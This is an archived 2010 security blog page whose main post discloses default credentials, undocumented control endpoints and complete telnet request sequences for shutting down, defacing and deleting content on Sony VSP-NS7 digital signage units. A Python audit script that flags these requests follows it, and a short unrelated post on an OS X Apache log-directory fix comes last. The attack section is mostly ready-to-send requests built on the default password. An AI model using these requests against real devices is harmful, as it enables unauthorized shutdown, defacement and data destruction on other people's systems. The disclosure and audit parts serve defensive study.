nDarkness

Archive for September, 2010

Sony VSP-NS7 Digital Signage Hacking

by on Sep.07, 2010, under Computer Security, Privacy, Software

Recently I tested out a Sony VSP-NS7 digital signage unit for a customer. This machine really impressed me considering I had used its predecessor the NSP100 and the newer technology was just what the client needed.

After doing some online searching I found that, other than the manual, there wasn’t much information out there on this unit. Knowing that we were going to place this box on a public network, I decided to run a few tests. I began by firing up Wireshark to sniff traffic to and from this box and was very surprised by what I found.

From this research I was able to determine that there is a web server running on port 4980 by default. Next I was able to retrieve the default username and password of the box by decoding the base64 string below.


    Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
    Authorization: Basic NSPXuser:NSPXuser


Since this isn’t published anywhere else I have seen, I would guess that not many users of this system know about it. In fact I would dare say that most installations of this system are still using the default username and password since Sony only mentions that the box can be controlled using their additional VSPA-D7 management software. If it costs big bucks it must be good, right?

Below are some of my findings:


    Default user information
    ————————
    User: NSPXuser
    Pass: NSPXuser
    Port: 4980

    Found commands
    ————————
    http://ip:4980 – Contains software version, unit name, unit and hard drive serial number and MAC address.
    http://ip:4980/import/ – Contains all user uploaded content.
    http://ip:4980/command.php – Uses several get variables to control the box.
    http://ip:4980/upload.php – Used in conjunction with get variables to send content to the box.

    http://ip:4980/command.php?cmd=NLOG&comp=cab – Download system logs.
    http://ip:4980/command.php?cmd=SLOG – Displays system logs.
    http://ip:4980/command.php?cmd=SYST – System statistics.
    http://ip:4980/command.php?cmd=DRST – Hard drive statistics.
    http://ip:4980/command.php?cmd=PLCL – Play files.
    http://ip:4980/command.php?cmd=SPCL – Stop playing files.
    http://ip:4980/command.php?cmd=CLST&table=web – List files based on type – web, still, movie and text.
    http://ip:4980/command.php?cmd=LCNF – Load configuration files.
    http://ip:4980/command.php?cmd=RMCL – Remove files.
    http://ip:4980/command.php?cmd=LTBL – Load tables.

    Power off and restart
    ————————
    http://ip:4980/command.php?cmd=RSET&shutdown – Turn the unit off
    http://ip:4980/command.php?cmd=RSET&reboot – Restart unit


Shutdown Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RSET&shutdown HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Without any warning the unit will shut down and have to be restarted from the box, or from the management software if the network allows magic packets.

URL Injection/Defacement Sony VSP-NS7

Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/db/property0.xml&append=0&mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 601
Cache-Control: no-cache

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<content ver="1.0" date="2010-09-06" time="21:28:43">
	<delete table="WEB_TBL">
		<index>004000003</index>
	</delete>
	<insert table="WEB_TBL">
		<index>004000003</index>
		<cdate>2010-09-06 21:21:55.678</cdate>
		<title>Pwnage</title>
		<size>0</size>
		<deldate>2010-10-06</deldate>
		<link>http://www.ndarkness.com/?p=577</link>
		<info>Pwned</info>
		<change>01</change>
		<width>0</width>
		<height>0</height>
		<xoffset>0</xoffset>
		<yoffset>0</yoffset>
		<xoption>0</xoption>
		<xreload>0</xreload>
	</insert>
</content>

Next we write the group file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
PUT /upload.php?href=/import/group0.xml&append=0&mkdir=0 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Content-Length: 185
Cache-Control: no-cache

<?xml version="1.0" encoding="UTF-8"?>
<group ver="1.0" date="2010-09-06" time="21:28:43">
	<property date="2010-09-06" time="21:28:43">/import/db/property0.xml</property>
</group>

Now we need to load the file.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=LTBL&file=/import/group0.xml&mode=2 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Finally, let’s force the unit to call our URL.

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=PLCL&id=06&index=004000003 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Delete Files From Sony VSP-NS7

First we need to obtain a list of images on the unit.
Fire up a telnet session and enter:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=CLST&table=still HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

Now we simply select the image we want to delete and enter the following:

telnet ip 4980
Trying ip...
Connected to ip.
Escape character is '^]'.
GET /command.php?cmd=RMCL&table=still&index=002000002 HTTP/1.1
Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=
User-Agent: VSP-NS7 HTTP Connection
Host: ip:4980
Cache-Control: no-cache

The VSPA-D7 management software does allow the default password and port to be changed, but if the traffic is sniffed, the password can easily be decoded again. Not to mention we can use a similar attack method to change the password of the box and lock the administrator out. Talk about a denial of service!

The only secure solution for this unit is to use a crossover cable and connect directly to the box, or to put it on a network by itself. If you leave it on a public network, it is only a matter of time before it falls prey to one of the attacks listed above.
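
For anyone monitoring a network that carries one of these units, the two points above (the Authorization header is only base64, and every control action is a plain request to command.php or upload.php) can be turned into a check over captured request text. This is an added example, not code from the original post; the function names, the finding labels, the choice of which commands count as state-changing and the sample capture are assumptions constructed for illustration.

```python
import base64
from urllib.parse import urlsplit, parse_qs

DEFAULT_CREDS = ("NSPXuser", "NSPXuser")  # default pair listed in the post
# Assumed split of the post's command list: these change device state.
STATE_CHANGING = {"RSET", "PLCL", "SPCL", "LCNF", "RMCL", "LTBL"}

def decode_basic(header_value):
    """Return (user, password) from a Basic Authorization value, else None."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except ValueError:  # malformed base64 or not UTF-8
        return None
    user, sep, password = text.partition(":")
    return (user, password) if sep else None

def audit_request(raw):
    """Return findings for one captured HTTP request (request line + headers)."""
    lines = raw.replace("\r\n", "\n").split("\n")
    method, target = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        if not line:
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    findings = []
    creds = decode_basic(headers.get("authorization", ""))
    if creds:
        findings.append("basic-auth-in-cleartext")  # readable by anyone on path
        if creds == DEFAULT_CREDS:
            findings.append("default-credentials")
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)
    cmd = query.get("cmd", [""])[0].upper()
    if url.path == "/command.php" and cmd in STATE_CHANGING:
        findings.append("state-changing-command:" + cmd)
    if url.path == "/upload.php" and method == "PUT":
        findings.append("content-write:" + query.get("href", ["?"])[0])
    return findings

# Constructed sample capture, modelled on the shutdown request in the post.
SAMPLE = ("GET /command.php?cmd=RSET&shutdown HTTP/1.1\r\n"
          "Authorization: Basic TlNQWHVzZXI6TlNQWHVzZXI=\r\n"
          "Host: ip:4980\r\n\r\n")
print(audit_request(SAMPLE))
```

A request that carries a changed password still produces the cleartext finding, which is why changing the default alone does not protect a unit on a shared network.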


OS X – Apache Web Sharing Starts But You Are Unable to Connect

by on Sep.06, 2010, under Mac OS X, Software

In an effort to save you an afternoon of searching, I thought I would post this to help the OS X users having this issue. The usual causes are no content in the web root, a firewall blocking requests, incorrect permissions and/or httpd.conf syntax errors. The one error that is a little tougher to track down is Apache not being able to create log files. Check the line in the httpd.conf file that shows the path to Apache’s log file. It should look something like this:

ErrorLog "/private/var/log/apache2/error_log"

Now if the directory apache2 does not exist in /private/var/log/, Apache will fail to start without giving you much of an error message. To correct this, in Terminal type:

sudo mkdir /private/var/log/apache2

Enter your admin password and restart Apache either in System Preferences=>Sharing=>Web Sharing or in Terminal by typing:

sudo apachectl restart

Once this is done, enter your web address in the web browser and you should see your pages load. Hope this helps!
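
The same check can be scripted so it covers every log directive in the file rather than only ErrorLog. This is an added example, not part of the original post, and it goes beyond the single case above by also handling CustomLog, TransferLog, piped loggers and paths relative to ServerRoot; the function name, the `fs_root` and `default_root` parameters and the sample configuration are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Log directives that take a file path as their first argument.
LOG_DIRECTIVE = re.compile(
    r'^\s*(ErrorLog|CustomLog|TransferLog)\s+(?:"([^"]*)"|(\S+))', re.I)
SERVER_ROOT = re.compile(r'^\s*ServerRoot\s+"?([^"\s]+)"?', re.I)

def missing_log_dirs(conf_text, fs_root="/", default_root="/usr"):
    """Return [(directive, log_path)] whose parent directory does not exist.

    fs_root lets the check run against a staged tree; default_root is an
    assumed fallback used only when the file has no ServerRoot line.
    """
    server_root, targets = default_root, []
    for line in conf_text.splitlines():  # commented-out lines never match
        root = SERVER_ROOT.match(line)
        if root:
            server_root = root.group(1)
        log = LOG_DIRECTIVE.match(line)
        if log:
            quoted, bare = log.group(2), log.group(3)
            targets.append((log.group(1), quoted if quoted is not None else bare))
    missing = []
    for directive, target in targets:
        if target.startswith("|") or target.lower().startswith("syslog"):
            continue  # piped logger or syslog target: no directory involved
        if not os.path.isabs(target):
            target = os.path.join(server_root, target)  # relative to ServerRoot
        parent = os.path.dirname(os.path.join(fs_root, target.lstrip("/")))
        if not os.path.isdir(parent):
            missing.append((directive, target))
    return missing

# Constructed httpd.conf fragment, checked against a temporary tree in which
# /private/var/log exists but the apache2 directory does not.
CONF = '''ServerRoot "/usr"
ErrorLog "/private/var/log/apache2/error_log"
CustomLog "/private/var/log/apache2/access_log" common
'''
with tempfile.TemporaryDirectory() as root:
    os.makedirs(os.path.join(root, "private/var/log"))
    for directive, path in missing_log_dirs(CONF, root):
        print(f"{directive}: create {os.path.dirname(path)} before starting Apache")
```

On a real system, call `missing_log_dirs(open(path_to_httpd_conf).read())` with the default `fs_root` to check the live filesystem.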

